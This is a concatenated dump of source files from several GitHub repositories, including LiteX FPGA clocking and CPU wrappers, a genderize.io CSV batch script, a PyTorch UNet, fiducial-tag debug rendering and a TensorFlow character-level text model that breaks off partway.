if self.P < self.PV_target:
Pump_seringe.stop()
pump_running = False
flag = True
if self.P > self.PV_target and pump_running == False:
Pump_seringe.run_reverse()
pump_running = True
self.update_thread.emit()
time.sleep(0.05)
def run(self):
print("thread start")
######################################################################
## Motor (displacement)
######################################################################
if self.FDmode == 'D' and not self.dF_target == '':
self.DisplacementControl()
elif self.FDmode == 'F' and not self.dF_target == '':
self.LoadControl()
if self.pause:
return
######################################################################
## PUMP
######################################################################
if self.PVmode == 'V' and not self.PV_target == '':
self.VolumeControl()
elif self.PVmode == 'P' and not self.PV_target == '': ## MODE PRESSURE CONSTANT
self.PressureControl()
print("QThread terminated")
self.signal_end.emit()
``` |
{
"source": "josephburnett/vaping",
"score": 3
} |
#### File: vaping/vaping/config.py
```python
import re
import munge
def parse_interval(val):
"""
converts a string to float of seconds
.5 = 500ms
90 = 1m30s
**Arguments**
- val (`str`)
"""
re_intv = re.compile(r"([\d\.]+)([a-zA-Z]+)")
val = val.strip()
total = 0.0
for match in re_intv.findall(val):
unit = match[1]
count = float(match[0])
if unit == "s":
total += count
elif unit == "m":
total += count * 60
elif unit == "ms":
total += count / 1000
elif unit == "h":
total += count * 3600
elif unit == "d":
total += count * 86400
else:
raise ValueError("unknown unit from interval string '%s'" % val)
return total
class Config(munge.Config):
"""
Vaping config manager
"""
defaults = {
"config": {
"vaping": {"home_dir": None, "pidfile": "vaping.pid", "plugin_path": [],},
},
"config_dir": "~/.vaping",
"codec": "yaml",
}
``` |
{
"source": "JosephBushagour/litex",
"score": 2
} |
#### File: build/gowin/platform.py
```python
import os
from litex.build.generic_platform import GenericPlatform
from litex.build.gowin import common, gowin
# GowinPlatform -----------------------------------------------------------------------------------
class GowinPlatform(GenericPlatform):
bitstream_ext = ".fs"
def __init__(self, device, *args, toolchain="gowin", devicename=None, **kwargs):
GenericPlatform.__init__(self, device, *args, **kwargs)
if not devicename:
idx = device.find('-')
likely_name = f"{device[:idx]}-{device[idx+3]}"
raise ValueError(f"devicename not provided, maybe {likely_name}?")
self.devicename = devicename
if toolchain == "gowin":
self.toolchain = gowin.GowinToolchain()
elif toolchain == "apicula":
raise ValueError("Apicula toolchain needs more work")
else:
raise ValueError("Unknown toolchain")
def get_verilog(self, *args, special_overrides=dict(), **kwargs):
so = dict(common.gowin_special_overrides)
so.update(special_overrides)
return GenericPlatform.get_verilog(self, *args, special_overrides=so,
attr_translate=self.toolchain.attr_translate,
**kwargs)
def build(self, *args, **kwargs):
return self.toolchain.build(self, *args, **kwargs)
```
#### File: litex/build/openfpgaloader.py
```python
from litex.build.tools import write_to_file
from litex.build.generic_programmer import GenericProgrammer
# openFPGAloader ------------------------------------------------------------------------------------------
class OpenFPGALoader(GenericProgrammer):
needs_bitreverse = False
def __init__(self, board):
self.board = board
def load_bitstream(self, bitstream_file):
cmd = ["openFPGALoader", "--board", self.board, "--bitstream", bitstream_file]
self.call(cmd)
def flash(self, address, data_file):
cmd = ["openFPGALoader", "--board", self.board, "--write-flash", "--bitstream", data_file]
if address:
cmd.append("--offset")
cmd.append(address)
self.call(cmd)
```
#### File: cores/clock/xilinx_s6.py
```python
from migen import *
from litex.soc.cores.clock.common import *
from litex.soc.cores.clock.xilinx_common import *
# Xilinx / Spartan6 --------------------------------------------------------------------------------
class S6PLL(XilinxClocking):
nclkouts_max = 6
clkin_freq_range = (19e6, 540e6)
def __init__(self, speedgrade=-1):
self.logger = logging.getLogger("S6PLL")
self.logger.info("Creating S6PLL, {}.".format(colorer("speedgrade {}".format(speedgrade))))
XilinxClocking.__init__(self)
self.divclk_divide_range = (1, 52 + 1)
self.vco_freq_range = {
-1: (400e6, 1000e6),
-2: (400e6, 1000e6),
-3: (400e6, 1080e6),
}[speedgrade]
def do_finalize(self):
XilinxClocking.do_finalize(self)
config = self.compute_config()
pll_fb = Signal()
self.params.update(
# Global.
p_SIM_DEVICE = "SPARTAN6",
p_BANDWIDTH = "OPTIMIZED",
p_COMPENSATION = "INTERNAL",
i_RST = self.reset,
i_PWRDWN = self.power_down,
o_LOCKED = self.locked,
# VCO.
p_REF_JITTER = .01, p_CLK_FEEDBACK="CLKFBOUT",
p_CLKIN1_PERIOD = 1e9/self.clkin_freq,
p_CLKIN2_PERIOD = 0.,
p_CLKFBOUT_MULT = config["clkfbout_mult"],
p_CLKFBOUT_PHASE = 0.,
p_DIVCLK_DIVIDE = config["divclk_divide"],
i_CLKINSEL = 1,
i_CLKIN1 = self.clkin,
i_CLKFBIN = pll_fb,
o_CLKFBOUT = pll_fb,
)
for n, (clk, f, p, m) in sorted(self.clkouts.items()):
self.params["p_CLKOUT{}_DIVIDE".format(n)] = config["clkout{}_divide".format(n)]
self.params["p_CLKOUT{}_PHASE".format(n)] = float(config["clkout{}_phase".format(n)])
self.params["p_CLKOUT{}_DUTY_CYCLE".format(n)] = 0.5
self.params["o_CLKOUT{}".format(n)] = clk
self.specials += Instance("PLL_ADV", **self.params)
class S6DCM(XilinxClocking):
""" single output with f_out = f_in * {2 .. 256} / {1 .. 256} """
nclkouts_max = 1
clkfbout_mult_frange = (2, 256 + 1)
clkout_divide_range = (1, 256 + 1)
def __init__(self, speedgrade=-1):
self.logger = logging.getLogger("S6DCM")
self.logger.info("Creating S6DCM, {}.".format(colorer("speedgrade {}".format(speedgrade))))
XilinxClocking.__init__(self)
self.divclk_divide_range = (1, 2) # FIXME
self.clkin_freq_range = {
-1: (0.5e6, 200e6),
-2: (0.5e6, 333e6),
-3: (0.5e6, 375e6),
}[speedgrade]
self.vco_freq_range = {
-1: (5e6, 1e16),
-2: (5e6, 1e16),
-3: (5e6, 1e16),
}[speedgrade]
def do_finalize(self):
XilinxClocking.do_finalize(self)
config = self.compute_config()
clk, f, p, m = sorted(self.clkouts.items())[0][1]
self.params.update(
p_CLKFX_MULTIPLY = config["clkfbout_mult"],
p_CLKFX_DIVIDE = config["clkout0_divide"] * config["divclk_divide"],
p_SPREAD_SPECTRUM = "NONE",
p_CLKIN_PERIOD = 1e9/self.clkin_freq,
i_CLKIN = self.clkin,
i_RST = self.reset,
i_FREEZEDCM = 0,
o_CLKFX = clk,
o_LOCKED = self.locked,
)
self.specials += Instance("DCM_CLKGEN", **self.params)
def expose_drp(self):
self._cmd_data = CSRStorage(10)
self._send_cmd_data = CSR()
self._send_go = CSR()
self._status = CSRStatus(4)
progdata = Signal()
progen = Signal()
progdone = Signal()
locked = Signal()
self.params.update(
i_PROGCLK = ClockSignal(),
i_PROGDATA = progdata,
i_PROGEN = progen,
o_PROGDONE = progdone
)
remaining_bits = Signal(max=11)
transmitting = Signal()
self.comb += transmitting.eq(remaining_bits != 0)
sr = Signal(10)
self.sync += [
If(self._send_cmd_data.re,
remaining_bits.eq(10),
sr.eq(self._cmd_data.storage)
).Elif(transmitting,
remaining_bits.eq(remaining_bits - 1),
sr.eq(sr[1:])
)
]
self.comb += [
progdata.eq(transmitting & sr[0]),
progen.eq(transmitting | self._send_go.re)
]
# Enforce gap between commands
busy_counter = Signal(max=14)
busy = Signal()
self.comb += busy.eq(busy_counter != 0)
self.sync += If(self._send_cmd_data.re,
busy_counter.eq(13)
).Elif(busy,
busy_counter.eq(busy_counter - 1)
)
self.comb += self._status.status.eq(Cat(busy, progdone, self.locked))
self.logger.info("Exposing DRP interface.")
```
#### File: cpu/minerva/core.py
```python
import os
import subprocess
from migen import *
from litex import get_data_mod
from litex.soc.interconnect import wishbone
from litex.soc.cores.cpu import CPU, CPU_GCC_TRIPLE_RISCV32
# Variants -----------------------------------------------------------------------------------------
CPU_VARIANTS = ["standard"]
# Minerva ------------------------------------------------------------------------------------------
class Minerva(CPU):
name = "minerva"
human_name = "Minerva"
variants = CPU_VARIANTS
data_width = 32
endianness = "little"
gcc_triple = CPU_GCC_TRIPLE_RISCV32
linker_output_format = "elf32-littleriscv"
nop = "nop"
io_regions = {0x80000000: 0x80000000} # Origin, Length.
# GCC Flags.
@property
def gcc_flags(self):
flags = "-march=rv32im "
flags += "-mabi=ilp32 "
flags += "-D__minerva__ "
return flags
def __init__(self, platform, variant="standard"):
self.platform = platform
self.variant = variant
self.reset = Signal()
self.interrupt = Signal(32)
self.ibus = ibus = wishbone.Interface()
self.dbus = dbus = wishbone.Interface()
self.periph_buses = [self.ibus, self.dbus] # Peripheral buses (Connected to main SoC's bus).
self.memory_buses = [] # Memory buses (Connected directly to LiteDRAM).
# # #
self.cpu_params = dict(
# Clk / Rst.
i_clk = ClockSignal("sys"),
i_rst = ResetSignal("sys") | self.reset,
# IRQ.
i_timer_interrupt = 0,
i_software_interrupt = 0,
i_external_interrupt = self.interrupt,
# Ibus.
o_ibus__stb = ibus.stb,
o_ibus__cyc = ibus.cyc,
o_ibus__cti = ibus.cti,
o_ibus__bte = ibus.bte,
o_ibus__we = ibus.we,
o_ibus__adr = ibus.adr,
o_ibus__dat_w = ibus.dat_w,
o_ibus__sel = ibus.sel,
i_ibus__ack = ibus.ack,
i_ibus__err = ibus.err,
i_ibus__dat_r = ibus.dat_r,
# Dbus.
o_dbus__stb = dbus.stb,
o_dbus__cyc = dbus.cyc,
o_dbus__cti = dbus.cti,
o_dbus__bte = dbus.bte,
o_dbus__we = dbus.we,
o_dbus__adr = dbus.adr,
o_dbus__dat_w = dbus.dat_w,
o_dbus__sel = dbus.sel,
i_dbus__ack = dbus.ack,
i_dbus__err = dbus.err,
i_dbus__dat_r = dbus.dat_r,
)
def set_reset_address(self, reset_address):
assert not hasattr(self, "reset_address")
self.reset_address = reset_address
@staticmethod
def elaborate(reset_address, with_icache, with_dcache, with_muldiv, verilog_filename):
cli_params = []
cli_params.append("--reset-addr={}".format(reset_address))
if with_icache:
cli_params.append("--with-icache")
if with_dcache:
cli_params.append("--with-dcache")
if with_muldiv:
cli_params.append("--with-muldiv")
cli_params.append("generate")
cli_params.append("--type=v")
sdir = get_data_mod("cpu", "minerva").data_location
if subprocess.call(["python3", os.path.join(sdir, "cli.py"), *cli_params],
stdout=open(verilog_filename, "w")):
raise OSError("Unable to elaborate Minerva CPU, please check your nMigen/Yosys install")
def do_finalize(self):
assert hasattr(self, "reset_address")
verilog_filename = os.path.join(self.platform.output_dir, "gateware", "minerva.v")
self.elaborate(
reset_address = self.reset_address,
with_icache = True,
with_dcache = True,
with_muldiv = True,
verilog_filename = verilog_filename)
self.platform.add_source(verilog_filename)
self.specials += Instance("minerva_cpu", **self.cpu_params)
```
#### File: litex/test/test_icap.py
```python
import unittest
from migen import *
from litex.soc.cores.icap import ICAP, ICAPBitstream
class TestICAP(unittest.TestCase):
def test_icap_command_reload(self):
def generator(dut):
yield dut.addr.eq(0x4)
yield dut.data.eq(0xf)
for i in range(16):
yield
yield dut.send.eq(1)
yield
yield dut.send.eq(0)
for i in range(256):
yield
dut = ICAP(with_csr=False, simulation=True)
clocks = {"sys": 10, "icap":20}
run_simulation(dut, generator(dut), clocks, vcd_name="icap.vcd")
def test_icap_bitstream_syntax(self):
dut = ICAPBitstream(simulation=True)
``` |
{
"source": "JosephCantrell/UmbrellaSecondAssessment",
"score": 3
} |
#### File: JosephCantrell/UmbrellaSecondAssessment/genderize.py
```python
from genderize import Genderize, GenderizeException
import csv
import sys
import os.path
import time
import argparse
import logging
import jpyhelper as jpyh
# Allow override command line input FINISHED
# Allow user input override search column through command line FINISHED
# Create override column searching FINISHED
# Strip leading and tailing whitespaces from overriden values FINISHED
# Allow different headers to be written based off of if we are overriding FINISHED
# Print the original file columns if we are overriding FINISHED
# Allow -a to work with overrides FINISHED
# TEST CASES:
# No Override, No -a Tested on file "test_big.csv" SUCCESS - 300 Names and gender info written
# No Override, Yes -a Tested on file "test_big.csv" SUCCESS - 149 Names and gender info written
# Yes Override, No -a Tested on file "genderize_test_file.csv" SUCCESS - 51 Names, original information, and Gender info written
# Yes Override, Yes -a Tested on file "genderize_test_file.csv" SUCCESS - 45 Names, original information, and Gender info written
# Created this function with the intention of having it used in multiple locations, but ended up only needed it in one.
# This function iterates through a given list to find every value at the given position.
# It then saves this position to a list, where we later pop the list item and return the list.
def remove_dupes(list, search_column):
names = []
remove_list = []
for index, row in enumerate(list):
stripped = row[search_column].strip()
if stripped not in names:
names.append(stripped)
else:
remove_list.append(index)
# I know there is a better way to do this, but i could not pop items off of the list in the for loop above
# without losing an item. A second "michael" was showing up in the final csv file. This method allowed me to get
# a proper output on the csv file
for index, remove in enumerate(removeList):
list.pop(remove - index)
return list
# Created a function to write new headers into the csv file. Used in two locations.
def write_headers(writer, original_headers):
new_headers = ["gender", "probability", "count"]
# Add the new headers on the tail end of our original headers list.
original_headers = original_headers + new_headers
# Write the original headers list to the output csv file
writer.writerow(original_headers)
def genderize(args):
print(args)
#File initialization
dir_path = os.path.dirname(os.path.realpath(__file__))
logging.basicConfig(filename=dir_path + os.sep + "log.txt", level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger=logging.getLogger(__name__)
ofilename, ofile_extension = os.path.splitext(args.output)
ofile = ofilename + "_" + time.strftime("%Y%m%d-%H%M%S") + ".csv"
ifile = args.input
if os.path.isabs(ifile):
print("\n--- Input file: " + ifile)
else:
print("\n--- Input file: " + dir_path + os.sep + ifile)
if os.path.isabs(ofile):
print("--- Output file: " + ofile)
else:
print("--- Output file: " + dir_path + os.sep + ofile + "\n")
#File integrity checking
if not os.path.exists(ifile):
print("--- Input file does not exist. Exiting.\n")
sys.exit()
if not os.path.exists(os.path.dirname(ofile)):
print("--- Error! Invalid output file path. Exiting.\n")
sys.exit()
#Some set up stuff
##csv.field_size_limit(sys.maxsize)
#Initialize API key
if not args.key == "NO_API":
print("--- API key: " + args.key + "\n")
genderize = Genderize(
user_agent='GenderizeDocs/0.0',
api_key=args.key)
key_present = True
else:
print("--- No API key provided.\n")
key_present = False
# Modify this section to take into account what the user wants to use through the command line
#Open ifile
with open(ifile, 'r', encoding="utf8") as csvfile:
readCSV = csv.reader(csvfile, delimiter=',', skipinitialspace=True)
first_name = []
raw = []
original_headers = [];
is_override = False
column_number = -1
# we are attempting to override the column that the names are stored in
# Easier to check a boolean than to constantly check if args.override is equal to 'NO_OVERRIDE'
if args.override != 'NO_OVERRIDE':
is_override = True
for row in readCSV: #Read CSV into first_name list
# if we are overriding the search column
if is_override:
# ugly nested mess but it works.
# if we have not found the list position of the desired override column
if column_number == -1:
# get the first row from the reader (assumed to be the first row)
first_name.append(row)
# also save this to the raw list for later use
raw.append(row)
# iterate through each item in the row we just saved and keep track of the for loop index
for index, column in enumerate(first_name[0]):
# if our column name is equal to the override name, we found the index number we need to proceed. Break from the loop
if column == args.override:
column_number = index
break
# error detection if the user override is not found in the header of the input csv.
if index == len(first_name[0])-1:
print("User Override '" + args.override + "' not found in input CSV file, Exiting...")
sys.exit()
# Our column number should be found by now, so continue to import the specific data that we want.
else:
# IMPORTANT: we need to remove all leading and trailing whitespaces to ensure that the genderizer responds with correct information
stripped = row[column_number].strip()
# append our stripped string onto the first_name list
first_name.append(stripped)
# save the entire row to the raw list
raw.append(row)
# if no override, continue like normal
else:
first_name.append(row)
# if we have a header, we need to remove it so it is not included in the submission
if args.noheader == False:
if is_override:
# Before we pop the first list item in first_name, save it to be our original headers so we can write them later
original_headers = first_name[0]
# We also need to pop the for item in the raw list or we will end up with extra data
raw.pop(0)
first_name.pop(0) #Remove header
o_first_name = list()
# We dont need to strip the first name list if we are overriding because it has already been taken care of
if is_override:
o_first_name = first_name
# Removes the [''] on each list item so we just end up with names when iterating through the list
else:
for l in first_name:
for b in l:
o_first_name.append(b)
# moved uniq_first_name outside of the if statement for later use.
uniq_first_name = []
if args.auto == True:
uniq_first_name = list(dict.fromkeys(o_first_name))
chunks = list(jpyh.splitlist(uniq_first_name, 10));
print("--- Read CSV with " + str(len(first_name)) + " first_name. " + str(len(uniq_first_name)) + " unique.")
else:
# splitting the name list into chunks of 10 due to api restrictions
chunks = list(jpyh.splitlist(first_name, 10));
print("--- Read CSV with " + str(len(first_name)) + " first_name")
print("--- Processed into " + str(len(chunks)) + " chunks")
if jpyh.query_yes_no("\n---! Ready to send to Genderdize. Proceed?") == False:
print("Exiting...\n")
sys.exit()
if os.path.isfile(ofile):
if jpyh.query_yes_no("---! Output file exists, overwrite?") == False:
print("Exiting...\n")
sys.exit()
print("\n")
if args.auto == True:
ofile = ofile + ".tmp"
response_time = [];
gender_responses = list()
with open(ofile, 'w', newline='', encoding="utf8") as f:
writer = csv.writer(f)
## TODO Add new system to write all rows of the original file. Done
# If we are overriding, we need to write different headers into the output csv file. We call the write_headers function to keep the code clean
if is_override:
write_headers(writer, original_headers)
# else, continue as expected
else:
writer.writerow(list(["first_name","gender", "probability", "count"]))
chunks_len = len(chunks)
stopped = False
for index, chunk in enumerate(chunks):
if stopped:
break
success = False
while not success:
try:
start = time.time()
if key_present:
dataset = genderize.get(chunk)
else:
dataset = Genderize().get(chunk)
gender_responses.append(dataset)
success = True
except GenderizeException as e:
#print("\n" + str(e))
logger.error(e)
#Error handling
if "response not in JSON format" in str(e) and args.catch == True:
if jpyh.query_yes_no("\n---!! 502 detected, try again?") == True:
success = False
continue
elif "Invalid API key" in str(e) and args.catch == True:
print("\n---!! Error, invalid API key! Check log file for details.\n")
else:
print("\n---!! GenderizeException - You probably exceeded the request limit, please add or purchase a API key. Check log file for details.\n")
stopped = True
break
response_time.append(time.time() - start)
print("Processed chunk " + str(index + 1) + " of " + str(chunks_len) + " -- Time remaining (est.): " + \
str( round( (sum(response_time) / len(response_time) * (chunks_len - index - 1)), 3)) + "s")
gender_dict = dict()
# Moved this function out of the autocomplete function to allow us to use it for the non-autocomplete writing as well
for response in gender_responses:
for d in response:
gender_dict[d.get("name")] = [d.get("gender"), d.get("probability"), d.get("count")]
# we need to iterate over all of our "cleaned" first names
for index, name in enumerate(o_first_name):
data = gender_dict.get(name)
# If we are overriding, we need to print our raw data plus our genderize information.
if is_override:
data_list = [data[0], data[1], data[2]]
writer.writerow(raw[index] + data_list)
# If we are not overriding, we print the standard information
else:
writer.writerow([name, data[0], data[1], data[2]])
# if we have the autocomplete enabled, we need to allow overriding in this mode as well.
if args.auto == True:
print("\nCompleting identical first_name...\n")
filename, file_extension = os.path.splitext(ofile)
with open(filename, 'w', newline='', encoding="utf8") as f:
writer = csv.writer(f)
# Before we enter the for loop, we need to print the correct headers into the output csv file.
# If we are overriding, we need to print out saved original headers as well as the new headers. We call our write_headers function to keep the code clean
if is_override:
write_headers(writer, original_headers)
# we need to remove duplicate items in our raw file for proper file writing.
raw_cleaned = remove_dupes(raw, column_number)
# If we are not overriding, we can print the standard headers.
else:
writer.writerow(list(["first_name","gender", "probability", "count"]))
# We need to iterate over our uniq_first_name list inorder to write the correct names
for index, name in enumerate(uniq_first_name):
# If we are overriding, we need to combine the data recieved from the genderize api and combine it with our clean raw list inorder to write the correct information
if is_override:
data = gender_dict.get(name)
data_list = [data[0], data[1], data[2]]
writer.writerow(raw_cleaned[index] + data_list)
# If we are not overriding, we can perform everything as expected.
else:
data = gender_dict.get(name)
writer.writerow([name, data[0], data[1], data[2]])
print("Done!\n")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Bulk genderize.io script')
required = parser.add_argument_group('required arguments')
required.add_argument('-i','--input', help='Input file name', required=True)
required.add_argument('-o','--output', help='Output file name', required=True)
parser.add_argument('-k','--key', help='API key', required=False, default="NO_API")
parser.add_argument('-c','--catch', help='Try to handle errors gracefully', required=False, action='store_true', default=True)
parser.add_argument('-a','--auto', help='Automatically complete gender for identical first_name', required=False, action='store_true', default=False)
parser.add_argument('-nh','--noheader', help='Input has no header row', required=False, action='store_true', default=False)
parser.add_argument('-ovr','--override',help='override the default search column', required=False, default='NO_OVERRIDE')
genderize(parser.parse_args())
``` |
{
"source": "josephcarmack/projectEuler",
"score": 3
} |
#### File: josephcarmack/projectEuler/problem1.py
```python
def problem1(number2go2):
s=0.0
for i in range(number2go2):
if(i%3==0 or i%5==0):
s += i
return s
print(problem1(1000))
``` |
{
"source": "JosephCatrambone/BlenderTopoTag",
"score": 3
} |
#### File: JosephCatrambone/BlenderTopoTag/debug.py
```python
import numpy
from fiducial import TopoTag
def save_plain_ppm(img, filename: str):
"""Save a matrix (floats) as a PPM image."""
with open(filename, 'wt') as fout:
fout.write("P3\n")
fout.write(f"{img.shape[1]} {img.shape[0]}\n")
fout.write("255\n")
idx = 0
for y in range(img.shape[0]):
for x in range(img.shape[1]):
if len(img.shape) == 2:
fout.write(str(int(255 * img[y, x])))
fout.write(" ")
fout.write(str(int(255 * img[y, x])))
fout.write(" ")
fout.write(str(int(255 * img[y, x])))
elif len(img.shape) == 3:
fout.write(str(int(255 * img[y, x, 0])))
fout.write(" ")
fout.write(str(int(255 * img[y, x, 1])))
fout.write(" ")
fout.write(str(int(255 * img[y, x, 2])))
if idx >= 5: # Max line length is 70. 3 digits + space * 3 channels -> 12. 70/12 ~> 5.
fout.write("\n")
idx = 0
else:
fout.write(" ")
idx += 1
fout.flush()
def debug_render_cube(tag: TopoTag, canvas):
"""Render a cube from the perspective of the camera."""
points_3d = numpy.asarray([
[0, 0, 0, 1],
[1, 0, 0, 1],
[1, 1, 0, 1],
[0, 1, 0, 1],
[0, 0, 1, 1],
[1, 0, 1, 1],
[1, 1, 1, 1],
[0, 1, 1, 1],
])
projection_matrix = tag.pose_raw # tag.extrinsics.to_matrix()
projection = (projection_matrix @ points_3d.T).T
projection[:, 0] /= projection[:, 2]
projection[:, 1] /= projection[:, 2]
#projection[:, 2] /= projection[:, 2]
# Draw faces...
for i in range(0, 4):
canvas.line((projection[i, 0], projection[i, 1], projection[(i+1)%4, 0], projection[(i+1)%4, 1]), fill=(255, 255, 255))
canvas.line((projection[(i+4), 0], projection[(i+4), 1], projection[(i+5)%8, 0], projection[(i+5)%8, 1]), fill=(255, 255, 255))
# Draw edges between faces (for the other faces)
print(projection)
def debug_show_tags(tags, island_data, island_matrix, show=True):
from PIL import ImageDraw
# Render a color image for the island_matrix.
img = debug_show_islands(island_matrix, show=False)
canvas = ImageDraw.Draw(img)
# Draw some red borders for candidate islands.
#for island in island_data[2:]:
# canvas.rectangle((island.x_min, island.y_min, island.x_max, island.y_max), outline=(255, 0, 0))
# Draw a pink border for each tag.
for tag in tags:
island_id = tag.island_id
for vertex in tag.vertex_positions:
canvas.rectangle((vertex[0]-1, vertex[1]-1, vertex[0]+1, vertex[1]+1), outline=(200, 200, 200))
canvas.text((island_data[island_id].x_min, island_data[island_id].y_min), f"I{island_id} - Code{tag.tag_id}", fill=(255, 255, 255))
canvas.rectangle((island_data[island_id].x_min, island_data[island_id].y_min, island_data[island_id].x_max, island_data[island_id].y_max), outline=(255, 0, 255))
canvas.line((tag.top_left[0], tag.top_left[1], tag.top_right[0], tag.top_right[1]), fill=(0, 255, 255))
canvas.line((tag.top_left[0], tag.top_left[1], tag.bottom_left[0], tag.bottom_left[1]), fill=(0, 255, 255))
#debug_render_cube(tag, canvas)
print(f"Tag origin: {tag.extrinsics.x_translation}, {tag.extrinsics.y_translation}, {tag.extrinsics.z_translation}")
if show:
img.show()
return img
def debug_show_islands(classes, show=True):
from PIL import Image
import itertools
num_classes = classes.max()
class_colors = list(itertools.islice(itertools.product(list(range(64, 255, 1)), repeat=3), num_classes+1))
colored_image = Image.new('RGB', (classes.shape[1], classes.shape[0]))
# This is the wrong way to do it. Should just cast + index.
for y in range(classes.shape[0]):
for x in range(classes.shape[1]):
colored_image.putpixel((x,y), class_colors[classes[y,x]])
if show:
colored_image.show()
return colored_image
def debug_show(mat):
from PIL import Image
img = Image.fromarray(mat*255.0)
img.show()
``` |
{
"source": "JosephCatrambone/greppic",
"score": 2
} |
#### File: greppic/training/model.py
```python
import math
import torch
import torch.nn as nn
def assert_power_of_two(n: int):
assert 2**int(math.log(n)/math.log(2)) == n
class Reshape(nn.Module):
# Resize to the target shape, auto-inferring the -1 dimension from the rest.
def __init__(self, *shape):
super(Reshape, self).__init__()
self.shape = shape
def forward(self, x):
return x.view(*self.shape)
class DoubleConv(nn.Module):
def __init__(self, in_channels: int, out_channels: int):
super(DoubleConv, self).__init__()
self.op = nn.Sequential(
# No bias 'cause we're using BatchNorm. It will get cancelled out.
nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(out_channels),
nn.SiLU(inplace=True),
nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(out_channels),
nn.SiLU(inplace=True),
)
def forward(self, x):
return self.op(x)
class UNet(nn.Module):
def __init__(self, in_channels:int = 3, out_channels: int = 3, feature_counts=None):
super(UNet, self).__init__()
# Prevent modification of mutable default.
if feature_counts is None:
feature_counts = [64, 128, 256, 512]
# Need nn.ModuleList instead of List for batch evals.
self.downsamples = nn.ModuleList()
self.bottleneck = DoubleConv(feature_counts[-1], feature_counts[-1]*2)
self.upsamples = nn.ModuleList()
self.finalconv = nn.Conv2d(feature_counts[0], out_channels, kernel_size=1) # 1x1 conv -> Change # feats.
# Downsample-Reduction step.
num_channels = in_channels
for f_count in feature_counts:
self.downsamples.append(DoubleConv(in_channels=num_channels, out_channels=f_count))
num_channels = f_count
# Up-steps.
for f_count in reversed(feature_counts):
# For theses one needs to step by 3 in the upsample step:
# Use 2x Upscale / Depth-convolve as an operation.
#self.upsamples.append(nn.UpsamplingBilinear2d(scale_factor=2))
#self.upsamples.append(nn.Conv2d(f_count*2, f_count, kernel_size=1))
# Use 4x Upscale / Double-convolve as an operation.
#self.upsamples.append(nn.UpsamplingNearest2d(scale_factor=4))
#self.upsamples.append(DoubleConv(f_count*2, f_count))
# For this one needs to step by two in the upsample step. (See upsample_step_size)
# Use ConvTranspose as an operation:
self.upsamples.append(nn.ConvTranspose2d(f_count*2, f_count, kernel_size=2, stride=2)) # Upscale 2x.
# Final concatenated convolution:
self.upsamples.append(DoubleConv(f_count*2, f_count))
def forward(self, x):
skip_connections = list() # Don't need ModuleList because this is not retained.
for dwn in self.downsamples:
x = dwn(x)
skip_connections.append(x)
x = torch.max_pool2d(x, kernel_size=2, stride=2)
x = self.bottleneck(x)
skip_connections.reverse()
upsample_step_size = 2
for idx in range(0, len(self.upsamples), upsample_step_size):
x = self.upsamples[idx+0](x)
#x = self.upsamples[idx+1](x)
skip_x = skip_connections[idx//upsample_step_size]
# It's possible that due to integer division the sizes slightly mismatch.
#if x.shape[2] != skip_x.shape[2] or x.shape[3] != skip_x.shape[3]:
# This causes issues withunpacking non-iterables:
#_, _, h, w = sk.shape
#x = torchvision.transforms.CenterCrop((h, w))(x)
# This causes issues with PIL/Tensor mismatch.
#x = VF.resize(x, size=sk.shape[2:])
#x = torchvision.transforms.functional.resize(x, size=sk.shape[2:])
# This seems to work:
#x = torch.nn.functional.interpolate(x, size=skip_x.shape[2:])
assert len(skip_x.shape) == 4 # So we don't accidentally unpinch another dimension.
concat_skip = torch.cat((skip_x, x), dim=1) # Dim 1 is channel-dimension. [b, c, h, w]
x = self.upsamples[idx+1](concat_skip)
return torch.sigmoid(self.finalconv(x))
``` |
{
"source": "JosephCatrambone/NLP_TensorFlow",
"score": 3
} |
#### File: JosephCatrambone/NLP_TensorFlow/bitreader.py
```python
from random import random
import numpy
TERMINATOR = "\0"
CHARSET = " abcdefghijklmnopqrstuvwxyz.:;'\"" + TERMINATOR
CHARACTER_SET = set(CHARSET) # Some naming ambiguity. Forgive me.
INDEX_CHARACTER_MAP = {k:v for k,v in enumerate(CHARSET)} # index -> letter
CHARACTER_INDEX_MAP = {v:k for k,v in enumerate(CHARSET)} # letter -> index
def get_sentence_vector_length(character_limit):
return character_limit*len(CHARSET)
def string_to_vector(sentence, flatten=True):
vector = list()
for character in sentence.lower():
subvector = numpy.zeros(len(CHARSET))
if character in CHARACTER_SET:
subvector[CHARACTER_INDEX_MAP[character]] = 1.0
vector.append(subvector)
result = numpy.asarray(vector)
if flatten:
result = result.reshape(1,-1)[0]
return result
def vector_to_string(vector):
# Flatten if in square setup.
if vector.ndim == 2:
vector = vector.reshape(1,-1)[0]
s = ""
# Step through vector in CHARSET increments.
block_length = len(CHARSET)
for index in range(0, len(vector), block_length):
block = vector[index:index+block_length]
block_energy = block.sum()
energy = random()*block_energy # This block defines a probability distribution.
if block_energy == 0:
continue # No prediction?
# TODO: Add an invalid char.
for subindex in range(block_length):
# Did we randomly select this character?
if energy < block[subindex]:
# Yes.
# Also, is this the end of-line character?
char = INDEX_CHARACTER_MAP[subindex]
if char == TERMINATOR:
return s
else:
s += char
break;
else:
energy -= block[subindex]
return s
```
#### File: JosephCatrambone/NLP_TensorFlow/nlp_tensorflow.py
```python
import sys, os
import csv
import gzip
import numpy
import tensorflow as tf
import bitreader
# We have some big fields.
csv.field_size_limit(sys.maxsize)
# Globals
INPUT_FILENAME = sys.argv[1]
DATA_COLUMN = int(sys.argv[2])
LEARNING_RATE = 0.01
TRAINING_ITERATIONS = 20000000
BATCH_SIZE = 5
SENTENCE_LIMIT = 140 # Empty pad after this.
N_INPUTS = bitreader.get_sentence_vector_length(SENTENCE_LIMIT)
WORD_CHUNK_SIZE = 4
DROPOUT = 0.8
DISPLAY_INCREMENT = 1
# Create model
x = tf.placeholder(tf.types.float32, [None, 1, N_INPUTS, 1])
keep_prob = tf.placeholder(tf.types.float32) #dropout
def build_model(name, inputs, dropout_toggle, char_sample_size=WORD_CHUNK_SIZE):
#x = tf.reshape(inputs, shape=[-1, 1, N_INPUTS, 1])
filter_bank_0 = 16
filter_bank_1 = 8
filter_bank_3 = 64
# conv2d input is [b, h, w, d]
# filter is [h, w, ...]
# multiplied by filter [di, dj, :, :]
sample_vec_len = bitreader.get_sentence_vector_length(char_sample_size)
wc1 = tf.Variable(tf.random_normal([1, sample_vec_len, 1, filter_bank_0]))
